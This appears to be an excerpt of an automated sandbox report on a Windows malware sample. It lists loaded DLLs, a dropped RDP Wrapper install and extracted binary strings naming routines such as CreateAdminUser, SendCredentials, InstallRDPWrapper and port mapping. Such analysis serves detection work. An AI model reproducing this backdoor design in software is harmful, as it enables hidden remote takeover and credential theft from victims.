Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: version.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: wldp.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: amsi.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: userenv.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: profapi.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: msasn1.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: gpapi.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: rasapi32.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: rasman.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: rtutils.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: mswsock.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: winhttp.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: dnsapi.dll
Source: C:\ProgramData\AFHDGDGIID.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File written: C:\Program Files\RDP Wrapper\rdpwrap.ini

Source: C:\ProgramData\AFHDGDGIID.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.ini
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.dll

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
Source:	Binary string: c:\rje\tg\vlt\obj\Release\ojc.pdb source: IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr
Source:	Binary string: costura.costura.pdb.compressedlB^q source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr
Source:	Binary string: costura.costura.pdb.compressed source: AFHDGDGIID.exe, 0000000C.00000000.2399577168.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, AFHDGDGIID.exe.2.dr, 66f5d9ab0d4c7_rdp[1].exe.2.dr
Source:	Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
Source:	Binary string: <>c__DisplayClass0_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1<>u__2Func`2Dictionary`2<Main>d__5get_UTF8<Module><Main>Q2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBSystem.IOGetPublicIP_Costuracostura.metadatamscorlibSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandGenerateRandomPasswordpasswordNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheEnumerableIDisposableget_AsyncWaitHandleDownloadFileget_NamefullNameGetAdminGroupNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValueadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamset_ItemSystemSymmetricAlgorithmHashAlgorithmRandomrandomICryptoTransformTimeSpanIsPortOpenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatObjectSelectBeginConnectSystem.NetWaitForExitIAsyncResultGetResultSetResultToLowerInvariantWebClientTcpClientEnvironmentStartConvertRDPPortportget_StandardOutputset_RedirectStandardOutputExecuteCommandWithOutputMoveNextSystem.Textset_CreateNoWindowToArrayset_KeyContainsKeySystem.Security.CryptographyResolveAssemblyReadExistingAssemblyGetExecutingAssemblyIsNullOrEmptyWj66qRZAtguDUcGmA5
Source:	Binary string: RfxVmt.pdb source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.000000000301A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, rfxvmt.dll.19.dr, RDPWInst.exe.12.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.2520015830.0000000037B54000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.2498836602.000000002BC7A000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
Source:	Binary string: rdpclip.pdb source: RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2833427275.000000001FE3B000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
Source:	Binary string: RfxVmt.pdbGCTL source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.000000000301A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, rfxvmt.dll.19.dr, RDPWInst.exe.12.dr
